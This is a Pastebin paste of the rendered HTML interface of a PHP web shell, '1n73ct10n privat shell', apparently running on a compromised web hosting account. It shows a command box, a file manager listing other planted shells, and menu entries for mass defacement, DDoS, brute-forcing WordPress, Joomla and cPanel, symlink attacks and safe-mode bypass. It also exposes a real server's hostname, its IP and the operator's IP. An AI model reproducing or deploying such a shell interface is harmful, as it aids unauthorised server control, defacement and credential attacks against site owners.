Advertisement
Z3R089

shel

Oct 9th, 2013
469
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 56.21 KB | None | 0 0
  1. <html><head><title>=[ 1n73ct10n privat shell ]=</title>
  2. <script type="text/javascript">
  3. function tukar(lama,baru){
  4. document.getElementById(lama).style.display = 'none';
  5. document.getElementById(baru).style.display = 'block';
  6. }
  7. </script>
  8. <style type="text/css">
  9. body{
  10. background:#000000;;
  11. }
  12. a {
  13. text-decoration:none;
  14. }
  15. a:hover{
  16. border-bottom:1px solid #00ff00;
  17. }
  18. *{
  19. font-size:11px;
  20. font-family:Tahoma,Verdana,Arial;
  21. color:#00ff00;
  22. }
  23. #menu{
  24. background:#111111;
  25. margin:8px 2px 4px 2px;
  26. }
  27. #menu a{
  28. padding:4px 18px;
  29. margin:0;
  30. background:#222222;
  31. text-decoration:none;
  32. letter-spacing:2px;
  33. }
  34. #menu a:hover{
  35. background:#191919;
  36. border-bottom:1px solid #333333;
  37. border-top:1px solid #333333;
  38. }
  39. .tabnet{
  40. margin:15px auto 0 auto;
  41. border: 1px solid #333333;
  42. }
  43. .main {
  44. width:100%;
  45. }
  46. .gaya {
  47. color: #00ff00;
  48. }
  49. .inputz{
  50. background:#111111;
  51. border:0;
  52. padding:2px;
  53. border-bottom:1px solid #222222;
  54. border-top:1px solid #222222;
  55. }
  56. .inputzbut{
  57. background:#111111;
  58. color:#00ff00;
  59. margin:0 4px;
  60. border:1px solid #444444;
  61.  
  62. }
  63. .inputz:hover, .inputzbut:hover{
  64. border-bottom:1px solid #00ff00;
  65. border-top:1px solid #00ff00;
  66. }
  67. .output {
  68. margin:auto;
  69. border:1px solid #00ff00;
  70. width:100%;
  71. height:400px;
  72. background:#000000;
  73. padding:0 2px;
  74. }
  75. .cmdbox{
  76. width:100%;
  77. }
  78. .head_info{
  79. padding: 0 4px;
  80. }
  81. .b374k{
  82. font-size:30px;
  83. padding:0;
  84. color:#444444;
  85. }
  86. .b374k1{
  87. font-size:30px;
  88. padding:0;
  89. color: #333333;
  90. }
  91. .b374k_tbl{
  92. text-align:center;
  93. margin:0 4px 0 0;
  94. padding:0 4px 0 0;
  95. border-right:1px solid #333333;
  96. }
  97. .phpinfo table{
  98. width:100%;
  99. padding:0 0 0 0;
  100. }
  101. .phpinfo td{
  102. background:#111111;
  103. color:#cccccc;
  104. padding:6px 8px;;
  105. }
  106. .phpinfo th, th{
  107. background:#191919;
  108. border-bottom:1px solid #333333;
  109. font-weight:normal;
  110. }
  111. .phpinfo h2, .phpinfo h2 a{
  112. text-align:center;
  113. font-size:16px;
  114. padding:0;
  115. margin:30px 0 0 0;
  116. background:#222222;
  117. padding:4px 0;
  118. }
  119. .explore{
  120. width:100%;
  121. }
  122. .explore a {
  123. text-decoration:none;
  124. }
  125. .explore td{
  126. border-bottom:1px solid #333333;
  127. padding:0 8px;
  128. line-height:24px;
  129. }
  130. .explore th{
  131. padding:3px 8px;
  132. font-weight:normal;
  133. }
  134. .explore th:hover , .phpinfo th:hover{
  135. border-bottom:1px solid #00ff00;
  136. }
  137. .explore tr:hover{
  138. background:#111111;
  139. }
  140. .viewfile{
  141. background:#EDECEB;
  142. color:#000000;
  143. margin:4px 2px;
  144. padding:8px;
  145. }
  146. .sembunyi{
  147. display:none;
  148. padding:0;margin:0;
  149. }
  150.  
  151. </style>
  152. <br><center><img src="https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-prn1/65186_145110908973389_1514728916_n.jpg" height="250" width="400"></center>
  153. </head>
  154. <script language='javascript'>
  155. if (document.all||document.getElementById){
  156. var thetitle=document.title
  157. document.title=''
  158. }
  159. var data="Us3 Y0ur br41n biTch ! ! !";
  160. var done=1;
  161. function statusIn(text){
  162. decrypt(text,22,22);
  163. }
  164. function statusOut(){
  165. self.status='';
  166. done=1;
  167. }
  168. function decrypt(text, max, delay){
  169. if (done){
  170. done = 0;
  171. rantit(text, max, delay, 0, max);
  172. }
  173. }
  174. function rantit(text, runs_left, delay, charvar, max){
  175. if (!done){
  176. runs_left = runs_left - 1;
  177. var status = text.substring(0,charvar);
  178. for(var current_char = charvar; current_char < text.length; current_char++){
  179. status += data.charAt(Math.round(Math.random()*data.length));
  180. }
  181. document.title = status;
  182. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  183. var new_char = charvar + 1;
  184. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  185. if(runs_left > 0){
  186. setTimeout(rerun, delay);
  187. }
  188. else{
  189. if (charvar < text.length){
  190. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  191. }
  192. else
  193. {
  194. done = 1;
  195. }
  196. }
  197. }
  198. }
  199. if (document.all||document.getElementById)
  200. statusIn(thetitle)
  201. </script>
  202. <body onLoad="document.getElementById('cmd').focus();">
  203. <div class="main">
  204. <!-- head info start here -->
  205. <div class="head_info">
  206. <table><tr>
  207. <td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k">1n7<span class="b374k1">3ct</span>ion</span></a></td></tr><tr><td>Shell V.2.2</td></tr></table></td>
  208.  
  209. <td>Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_bwlimited/1.4<br />Linux ns9.lineadns.com 2.6.32-458.6.2.lve1.2.30.el6.x86_64 #1 SMP Fri Jul 12 15:02:22 EEST 2013 x86_64<br />uid=1139(servinfo) gid=1136(servinfo) groups=1136(servinfo)<br />server ip : 50.28.15.46 <span class="gaya">|</span> your ip : 189.154.128.78<br />safemode <span class="gaya">OFF<span><br />&nbsp;&gt;&nbsp;<a href="?y=/"> / </a><a href="?y=/home/">home / </a><a href="?y=/home/servinfo/">servinfo / </a><a href="?y=/home/servinfo/public_html/">public_html / </a></td>
  210. </tr></table>
  211. </div>
  212.  
  213. <!-- head info end here -->
  214. <!-- menu start -->
  215. <div id="menu">
  216. <a href="?y=/home/servinfo/public_html/">Explore</a>
  217. <a href="?y=/home/servinfo/public_html/&amp;x=jumping">jumping</a>
  218. <a href="?y=/home/servinfo/public_html/&amp;x=shell">Shell</a>
  219. <a href="?y=/home/servinfo/public_html/&amp;x=php">Eval</a>
  220. <a href="?y=/home/servinfo/public_html/&amp;x=mysql">Mysql</a>
  221. <a href="?y=/home/servinfo/public_html/&amp;x=phpinfo">Php Info</a>
  222. <a href="?y=/home/servinfo/public_html/&amp;x=netsploit">Net Sploit</a>
  223.  
  224. <a href="?y=/home/servinfo/public_html/&amp;x=upload">Upload</a>
  225. <a href="?y=/home/servinfo/public_html/&amp;x=mail">Mass Mailer</a>
  226. <a href="?y=/home/servinfo/public_html/&amp;x=chmod">Chmod</a>
  227. <a href="?y=/home/servinfo/public_html/&amp;x=sqli-scanner">SQLI Scan</a>
  228. <a href="?y=/home/servinfo/public_html/&amp;x=port-sc">Port Scan</a>
  229. <a href="?y=/home/servinfo/public_html/&amp;x=dos">Ddos</a>
  230. <a href="?y=/home/servinfo/public_html/&amp;x=tool">Tools</a>
  231. <a href="?y=/home/servinfo/public_html/&amp;x=symlink">Symlink</a><br><br>
  232. <a href="?y=/home/servinfo/public_html/&amp;x=config">Config</a>
  233.  
  234. <a href="?y=/home/servinfo/public_html/&amp;x=bypass">Bypass</a>
  235. <a href="?y=/home/servinfo/public_html/&amp;x=cgi">Cgi Shell</a>
  236. <a href="?y=/home/servinfo/public_html/&amp;x=cgi2012">CGI Telnet 2012</a>
  237. <a href="?y=/home/servinfo/public_html/&amp;x=domain">Domain</a>
  238. <a href="?y=/home/servinfo/public_html/&amp;x=mass">Mass Deface</a>
  239. <a href="?y=/home/servinfo/public_html/&amp;x=jodexer">Joomla IndChange</a>
  240. <a href="?y=/home/servinfo/public_html/&amp;x=vb">VB IndChange</a>
  241. <a href="?y=/home/servinfo/public_html/&amp;x=wp-reset">Wordpress Res Pass</a>
  242. <a href="?y=/home/servinfo/public_html/&amp;x=jm-reset">Joomla Res Pass</a>
  243.  
  244. <a href="?y=/home/servinfo/public_html/&amp;x=zone">Zone-H</a><br><br>
  245. <a href="?y=/home/servinfo/public_html/&amp;x=whmcs">WHMCS Decoder</a>
  246. <a href="?y=/home/servinfo/public_html/&amp;x=wpbrute">Wordpress BruteForce</a>
  247. <a href="?y=/home/servinfo/public_html/&amp;x=jbrute">Joomla BruteForce</a>
  248. <a href="?y=/home/servinfo/public_html/&amp;x=brute">Cpanel BruteForce</a>
  249. <a href="?y=/home/servinfo/public_html/&amp;x=adfin">Admin Finder</a>
  250. <a href="?y=/home/servinfo/public_html/&amp;x=hash">Password Hash</a>
  251. <a href="?y=/home/servinfo/public_html/&amp;x=hashid">Hash ID</a>
  252. <a href="?y=/home/servinfo/public_html/&amp;x=string">Script Encode</a>
  253.  
  254. <a href="?y=/home/servinfo/public_html/&amp;x=about">About</a>
  255. <a href="?y=/home/servinfo/public_html/&amp;x=logout">Log-Out</a>
  256.  
  257. </div>
  258. <!-- menu end -->
  259.  
  260.  
  261. <form action="?y=/home/servinfo/public_html/&amp;x=shell" method="post" style="margin:8px 0 0 0;">
  262. <table class="cmdbox" style="width:50%;">
  263. <tr><td>servinfo $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr>
  264. </form>
  265.  
  266. <form action="?" method="get" style="margin:8px 0 0 0;">
  267. <input type="hidden" name="y" value="/home/servinfo/public_html/" />
  268. <tr><td>view file/folder</td><td><input onMouseOver="this.focus();" id="goto" class="inputz" type="text" name="view" style="width:400px;" value="/home/servinfo/public_html/" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr>
  269. </form></table><table class="explore">
  270. <tr><th>name</th><th style="width:80px;">size</th><th style="width:210px;">owner:group</th><th style="width:80px;">perms</th><th style="width:110px;">modified</th><th style="width:190px;">actions</th></tr>
  271.  
  272. <tr><td><a href="?y=/home/servinfo/public_html/">.</a></td><td>LINK</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>nobody</td><td>rwxr-x---</td><td style="text-align:center;">03-Oct-2013 14:19</td><td><span id="titik1"><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/newfile.php">newfile</a> | <a href="javascript:tukar('titik1','titik1_form');">newfolder</a></span>
  273. <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;">
  274. <input type="hidden" name="y" value="/home/servinfo/public_html/" />
  275.  
  276. <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder" />
  277. <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go !" />
  278. </form></td></tr>
  279. <tr><td><a href="?y=/home/servinfo/">..</a></td><td>LINK</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwx--x--x</td><td style="text-align:center;">06-Oct-2013 20:44</td><td><span id="titik2"><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/newfile.php">newfile</a> | <a href="javascript:tukar('titik2','titik2_form');">newfolder</a></span>
  280.  
  281. <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;">
  282. <input type="hidden" name="y" value="/home/servinfo/public_html/" />
  283. <input class="inputz" style="width:140px;" type="text" name="mkdir" value="a_new_folder" />
  284. <input class="inputzbut" type="submit" name="rename" style="width:35px;" value="Go !" />
  285. </form>
  286. </td></tr><tr><td><a id="1_link" href="?y=/home/servinfo/public_html/1/">[ 1 ]</a>
  287. <form action="?y=/home/servinfo/public_html/" method="post" id="1_form" class="sembunyi" style="margin:0;padding:0;">
  288. <input type="hidden" name="oldname" value="1" style="margin:0;padding:0;" />
  289.  
  290. <input class="inputz" style="width:200px;" type="text" name="newname" value="1" />
  291. <input class="inputzbut" type="submit" name="rename" value="rename" />
  292. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('1_form','1_link');" />
  293. </form>
  294. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">28-Sep-2013 14:44</td><td><a href="javascript:tukar('1_link','1_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/1">delete</a></td></tr><tr><td><a id="2_link" href="?y=/home/servinfo/public_html/2/">[ 2 ]</a>
  295.  
  296. <form action="?y=/home/servinfo/public_html/" method="post" id="2_form" class="sembunyi" style="margin:0;padding:0;">
  297. <input type="hidden" name="oldname" value="2" style="margin:0;padding:0;" />
  298. <input class="inputz" style="width:200px;" type="text" name="newname" value="2" />
  299. <input class="inputzbut" type="submit" name="rename" value="rename" />
  300. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('2_form','2_link');" />
  301. </form>
  302. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">28-Sep-2013 14:44</td><td><a href="javascript:tukar('2_link','2_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/2">delete</a></td></tr><tr><td><a id="anonghost_link" href="?y=/home/servinfo/public_html/anonghost/">[ anonghost ]</a>
  303.  
  304. <form action="?y=/home/servinfo/public_html/" method="post" id="anonghost_form" class="sembunyi" style="margin:0;padding:0;">
  305. <input type="hidden" name="oldname" value="anonghost" style="margin:0;padding:0;" />
  306. <input class="inputz" style="width:200px;" type="text" name="newname" value="anonghost" />
  307. <input class="inputzbut" type="submit" name="rename" value="rename" />
  308. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('anonghost_form','anonghost_link');" />
  309. </form>
  310. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">03-Oct-2013 14:10</td><td><a href="javascript:tukar('anonghost_link','anonghost_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/anonghost">delete</a></td></tr><tr><td><a id="cgi-bin_link" href="?y=/home/servinfo/public_html/cgi-bin/">[ cgi-bin ]</a>
  311.  
  312. <form action="?y=/home/servinfo/public_html/" method="post" id="cgi-bin_form" class="sembunyi" style="margin:0;padding:0;">
  313. <input type="hidden" name="oldname" value="cgi-bin" style="margin:0;padding:0;" />
  314. <input class="inputz" style="width:200px;" type="text" name="newname" value="cgi-bin" />
  315. <input class="inputzbut" type="submit" name="rename" value="rename" />
  316. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('cgi-bin_form','cgi-bin_link');" />
  317. </form>
  318. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">28-Sep-2013 14:44</td><td><a href="javascript:tukar('cgi-bin_link','cgi-bin_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/cgi-bin">delete</a></td></tr><tr><td><a id="cgi2012_link" href="?y=/home/servinfo/public_html/cgi2012/">[ cgi2012 ]</a>
  319.  
  320. <form action="?y=/home/servinfo/public_html/" method="post" id="cgi2012_form" class="sembunyi" style="margin:0;padding:0;">
  321. <input type="hidden" name="oldname" value="cgi2012" style="margin:0;padding:0;" />
  322. <input class="inputz" style="width:200px;" type="text" name="newname" value="cgi2012" />
  323. <input class="inputzbut" type="submit" name="rename" value="rename" />
  324. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('cgi2012_form','cgi2012_link');" />
  325. </form>
  326. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">28-Sep-2013 14:44</td><td><a href="javascript:tukar('cgi2012_link','cgi2012_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/cgi2012">delete</a></td></tr><tr><td><a id="config_link" href="?y=/home/servinfo/public_html/config/">[ config ]</a>
  327.  
  328. <form action="?y=/home/servinfo/public_html/" method="post" id="config_form" class="sembunyi" style="margin:0;padding:0;">
  329. <input type="hidden" name="oldname" value="config" style="margin:0;padding:0;" />
  330. <input class="inputz" style="width:200px;" type="text" name="newname" value="config" />
  331. <input class="inputzbut" type="submit" name="rename" value="rename" />
  332. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('config_form','config_link');" />
  333. </form>
  334. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">30-Sep-2013 14:14</td><td><a href="javascript:tukar('config_link','config_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/config">delete</a></td></tr><tr><td><a id="jac_link" href="?y=/home/servinfo/public_html/jac/">[ jac ]</a>
  335.  
  336. <form action="?y=/home/servinfo/public_html/" method="post" id="jac_form" class="sembunyi" style="margin:0;padding:0;">
  337. <input type="hidden" name="oldname" value="jac" style="margin:0;padding:0;" />
  338. <input class="inputz" style="width:200px;" type="text" name="newname" value="jac" />
  339. <input class="inputzbut" type="submit" name="rename" value="rename" />
  340. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('jac_form','jac_link');" />
  341. </form>
  342. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">28-Sep-2013 14:44</td><td><a href="javascript:tukar('jac_link','jac_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/jac">delete</a></td></tr><tr><td><a id="sym_link" href="?y=/home/servinfo/public_html/sym/">[ sym ]</a>
  343.  
  344. <form action="?y=/home/servinfo/public_html/" method="post" id="sym_form" class="sembunyi" style="margin:0;padding:0;">
  345. <input type="hidden" name="oldname" value="sym" style="margin:0;padding:0;" />
  346. <input class="inputz" style="width:200px;" type="text" name="newname" value="sym" />
  347. <input class="inputzbut" type="submit" name="rename" value="rename" />
  348. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('sym_form','sym_link');" />
  349. </form>
  350. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">28-Sep-2013 14:44</td><td><a href="javascript:tukar('sym_link','sym_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/sym">delete</a></td></tr><tr><td><a id="wp-admin_link" href="?y=/home/servinfo/public_html/wp-admin/">[ wp-admin ]</a>
  351.  
  352. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-admin_form" class="sembunyi" style="margin:0;padding:0;">
  353. <input type="hidden" name="oldname" value="wp-admin" style="margin:0;padding:0;" />
  354. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-admin" />
  355. <input class="inputzbut" type="submit" name="rename" value="rename" />
  356. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-admin_form','wp-admin_link');" />
  357. </form>
  358. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">27-Sep-2013 05:24</td><td><a href="javascript:tukar('wp-admin_link','wp-admin_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/wp-admin">delete</a></td></tr><tr><td><a id="wp-content_link" href="?y=/home/servinfo/public_html/wp-content/">[ wp-content ]</a>
  359.  
  360. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-content_form" class="sembunyi" style="margin:0;padding:0;">
  361. <input type="hidden" name="oldname" value="wp-content" style="margin:0;padding:0;" />
  362. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-content" />
  363. <input class="inputzbut" type="submit" name="rename" value="rename" />
  364. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-content_form','wp-content_link');" />
  365. </form>
  366. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">27-Sep-2013 05:24</td><td><a href="javascript:tukar('wp-content_link','wp-content_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/wp-content">delete</a></td></tr><tr><td><a id="wp-includes_link" href="?y=/home/servinfo/public_html/wp-includes/">[ wp-includes ]</a>
  367.  
  368. <form action="?y=/home/servinfo/public_html/" method="post" id="wp-includes_form" class="sembunyi" style="margin:0;padding:0;">
  369. <input type="hidden" name="oldname" value="wp-includes" style="margin:0;padding:0;" />
  370. <input class="inputz" style="width:200px;" type="text" name="newname" value="wp-includes" />
  371. <input class="inputzbut" type="submit" name="rename" value="rename" />
  372. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('wp-includes_form','wp-includes_link');" />
  373. </form>
  374. <td>DIR</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rwxr-xr-x</td><td style="text-align:center;">28-Sep-2013 14:44</td><td><a href="javascript:tukar('wp-includes_link','wp-includes_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;fdelete=/home/servinfo/public_html/wp-includes">delete</a></td></tr><tr><td><a id=".htaccess_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/.htaccess">.htaccess</a>
  375.  
  376. <form action="?y=/home/servinfo/public_html/" method="post" id=".htaccess_form" class="sembunyi" style="margin:0;padding:0;">
  377. <input type="hidden" name="oldname" value=".htaccess" style="margin:0;padding:0;" />
  378. <input class="inputz" style="width:200px;" type="text" name="newname" value=".htaccess" />
  379. <input class="inputzbut" type="submit" name="rename" value="rename" />
  380. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('.htaccess_link','.htaccess_form');" />
  381. </form>
  382. </td><td>???</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">24-Aug-2013 01:16</td>
  383.  
  384. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/.htaccess">edit</a> | <a href="javascript:tukar('.htaccess_link','.htaccess_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/.htaccess">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/.htaccess">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/.htaccess">gzip</a>)</td></tr><tr><td><a id="2.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/2.php">2.php</a>
  385. <form action="?y=/home/servinfo/public_html/" method="post" id="2.php_form" class="sembunyi" style="margin:0;padding:0;">
  386.  
  387. <input type="hidden" name="oldname" value="2.php" style="margin:0;padding:0;" />
  388. <input class="inputz" style="width:200px;" type="text" name="newname" value="2.php" />
  389. <input class="inputzbut" type="submit" name="rename" value="rename" />
  390. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('2.php_link','2.php_form');" />
  391. </form>
  392. </td><td>88.21 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">03-Oct-2013 14:01</td>
  393.  
  394. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/2.php">edit</a> | <a href="javascript:tukar('2.php_link','2.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/2.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/2.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/2.php">gzip</a>)</td></tr><tr><td><a id="2.php.txt_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/2.php.txt">2.php.txt</a>
  395. <form action="?y=/home/servinfo/public_html/" method="post" id="2.php.txt_form" class="sembunyi" style="margin:0;padding:0;">
  396.  
  397. <input type="hidden" name="oldname" value="2.php.txt" style="margin:0;padding:0;" />
  398. <input class="inputz" style="width:200px;" type="text" name="newname" value="2.php.txt" />
  399. <input class="inputzbut" type="submit" name="rename" value="rename" />
  400. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('2.php.txt_link','2.php.txt_form');" />
  401. </form>
  402. </td><td>34.8 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">03-Oct-2013 14:10</td>
  403.  
  404. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/2.php.txt">edit</a> | <a href="javascript:tukar('2.php.txt_link','2.php.txt_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/2.php.txt">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/2.php.txt">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/2.php.txt">gzip</a>)</td></tr><tr><td><a id="3.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/3.php">3.php</a>
  405. <form action="?y=/home/servinfo/public_html/" method="post" id="3.php_form" class="sembunyi" style="margin:0;padding:0;">
  406.  
  407. <input type="hidden" name="oldname" value="3.php" style="margin:0;padding:0;" />
  408. <input class="inputz" style="width:200px;" type="text" name="newname" value="3.php" />
  409. <input class="inputzbut" type="submit" name="rename" value="rename" />
  410. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('3.php_link','3.php_form');" />
  411. </form>
  412. </td><td>4.48 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">03-Oct-2013 14:10</td>
  413.  
  414. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/3.php">edit</a> | <a href="javascript:tukar('3.php_link','3.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/3.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/3.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/3.php">gzip</a>)</td></tr><tr><td><a id="Mailer.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/Mailer.php">Mailer.php</a>
  415. <form action="?y=/home/servinfo/public_html/" method="post" id="Mailer.php_form" class="sembunyi" style="margin:0;padding:0;">
  416.  
  417. <input type="hidden" name="oldname" value="Mailer.php" style="margin:0;padding:0;" />
  418. <input class="inputz" style="width:200px;" type="text" name="newname" value="Mailer.php" />
  419. <input class="inputzbut" type="submit" name="rename" value="rename" />
  420. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('Mailer.php_link','Mailer.php_form');" />
  421. </form>
  422. </td><td>8.39 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">27-Sep-2013 04:28</td>
  423.  
  424. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/Mailer.php">edit</a> | <a href="javascript:tukar('Mailer.php_link','Mailer.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/Mailer.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/Mailer.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/Mailer.php">gzip</a>)</td></tr><tr><td><a id="Newshell.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/Newshell.php">Newshell.php</a>
  425. <form action="?y=/home/servinfo/public_html/" method="post" id="Newshell.php_form" class="sembunyi" style="margin:0;padding:0;">
  426.  
  427. <input type="hidden" name="oldname" value="Newshell.php" style="margin:0;padding:0;" />
  428. <input class="inputz" style="width:200px;" type="text" name="newname" value="Newshell.php" />
  429. <input class="inputzbut" type="submit" name="rename" value="rename" />
  430. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('Newshell.php_link','Newshell.php_form');" />
  431. </form>
  432. </td><td>154.66 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">03-Oct-2013 14:19</td>
  433.  
  434. <td><a href="?y=/home/servinfo/public_html/&amp;edit=/home/servinfo/public_html/Newshell.php">edit</a> | <a href="javascript:tukar('Newshell.php_link','Newshell.php_form');">rename</a> | <a href="?y=/home/servinfo/public_html/&amp;delete=/home/servinfo/public_html/Newshell.php">delete</a> | <a href="?y=/home/servinfo/public_html/&amp;dl=/home/servinfo/public_html/Newshell.php">download</a>&nbsp;(<a href="?y=/home/servinfo/public_html/&amp;dlgzip=/home/servinfo/public_html/Newshell.php">gzip</a>)</td></tr><tr><td><a id="OpSyria.php_link" href="?y=/home/servinfo/public_html/&amp;view=/home/servinfo/public_html/OpSyria.php">OpSyria.php</a>
  435. <form action="?y=/home/servinfo/public_html/" method="post" id="OpSyria.php_form" class="sembunyi" style="margin:0;padding:0;">
  436.  
  437. <input type="hidden" name="oldname" value="OpSyria.php" style="margin:0;padding:0;" />
  438. <input class="inputz" style="width:200px;" type="text" name="newname" value="OpSyria.php" />
  439. <input class="inputzbut" type="submit" name="rename" value="rename" />
  440. <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar('OpSyria.php_link','OpSyria.php_form');" />
  441. </form>
  442. </td><td>4.21 kb</td><td style="text-align:center;">servinfo<span class="gaya"> : </span>servinfo</td><td>rw-r--r--</td><td style="text-align:center;">31-Aug-2013 21:01</td>
  443.  
